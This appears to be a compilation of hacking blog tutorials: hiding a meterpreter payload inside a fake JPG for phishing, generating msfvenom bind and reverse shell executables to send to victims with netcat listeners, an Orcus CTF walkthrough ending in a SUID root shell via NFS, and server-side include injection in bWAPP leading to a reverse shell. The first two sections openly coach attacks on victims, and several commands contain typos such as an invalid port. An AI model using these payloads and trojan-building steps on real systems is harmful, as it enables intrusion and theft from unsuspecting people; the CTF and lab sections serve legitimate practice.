Embedded Backdoor with Image using FakeImageExploiter

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!
Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git


Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.


Now made some changes inside setting file as shown the screenshot:
Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO  and scroll down for next configration.


In same way set these two values also as shown in screenshot then save the changes.
AUTO_PAYLOAD_BUILD=YES
AGENT_HANLER_PORT=4444


After making certain changes in setting file then open the terminal and run the program file:
Cd FakeImageExploiter
./ FakeImageExploiter.sh


Click on YES to execute framework.


Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.


After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.


Now select icon for your malicious image. 


Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.


Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.


When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

2 ways to use Msfvenom Payload with Netcat

In this article you will learn how we can connect with victim through netcat shell using msfvenom payload. There will be two different ways for hacking any system using msfvenom with netcat.

1st Method
Firstly open the terminal and type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 –f exe > /root/Desktop/root.exe


Then send this root.exe file to victim and open other terminal for netcat shell and type following command:
nc 192.168.0.103 89565
When victim will click on root.exe file attacker will get access of victim’s system.


2nd Method
Again open the terminal type following command for msfvenom which generate an exe payload:
Msfvenom –p windows/shell_reverse_tcp  lhost=192.168.0.107 lport=888 –f exe > /root/Desktop/1.exe


Then send this 1.exe file to victim and open other terminal for netcat shell and type following command:
nc -lvp 8888
When victim will click on 1.exe file attacker will get reverse connection of victim’s system.


Hack the Orcus CTF Challenge

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article we are sharing our work efforts which we have utilize to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box.

You can download it from here.

Let’s Breach!!
192.168.0.151 is the trget ip now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through namp.
nmap -p- -sV 192.168.0.151

From screenshot you can see there are so many open ports but I will go with port 80.


Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.


Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.


In browser I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.

So after unzip when I open it I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in hop to get something related to database.


Finally after making many efforts I found database username and password as dbuser: dbpasswords respectively.


In dirb brute force attack we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above given screenshot. Now again I will move towards browser to explore 192.168.0.1.51/phpmyadmin in URL. Form given below screenshot you can observe I had entered above username and password here.


When you will give correct login credential it will allow you to login inside phpmyadmin page. From screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.

Now inside zenphoto I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.


Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword
Without disturbing other fields click on save which will start database zenphoto installation.


This will start installation when you will click on go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.


Further click on given tab I agree to these terms and condition.


Now type name for new user as admin  and type password: password and confirm password as shown in below image and then click on apply tab given at the top 


Then login into zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.


Now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.

Most important thing is to start multi handler inside metasploit.


Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following url 192.168.0.151/zenphoto/albums, from given image you can see our shell.php is successfully uploaded now click on it.


When you will click on shell.php you will get meterpreter session inside metasploit. Now type following command in order to catch the flag.
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt

 Congrats! We have caught 1st flag.


After so many efforts I found a folder kippo then I step towards it for more information.
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
 Finally! Caught 2nd flag also.

Now for root privilege escalation open a text document and following: reference
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary

Int main (viod) {
                Setresuid (0, 0, 0,);
                System(“/bin/bash”);
}
Then save it as raj.c on the desktop.


Now upload raj.c file for compiling and gain root access as shown in following image.
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c


Since we know from the nmap’s result nfs port was open in targeted IP so taking advantage of it we will mount tmp ‘s data in url Kali Linux. Now create a folder mount data inside it.

mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj


./raj
Id
Cd /root
Cat flag.txt
Grate!! We have Caught 3rd flag also.
Now try yourself to find out one more flag.

Server Side Injection Explotation in bWapp

In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server. 
For more information visit owasp.org
 Let’s begin
In your kali Linux open the target IP in browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.


Set security level low, from list box chooses your bug select server side include injection now and click on hack.


Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.


Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.


when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP 192.168.1.107 of my Kali Linux.


Now I will try to exploit this vulnerability by sending different types of malicious code into web application.  If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.



So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulneable.


Similarly I had executed following code which will return current date and time.


So in this way this directive will display the content of http environment variable and from screenshot you can read he highlighted day, date and time.


If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.


Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.


Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.


Wonderful!!  So you can see without making proper compromise to the server we have got all present directories inside it.


Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.


So when again you will click on lookup tab you will get reverse connection through netcat shell  as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.
Id
pwd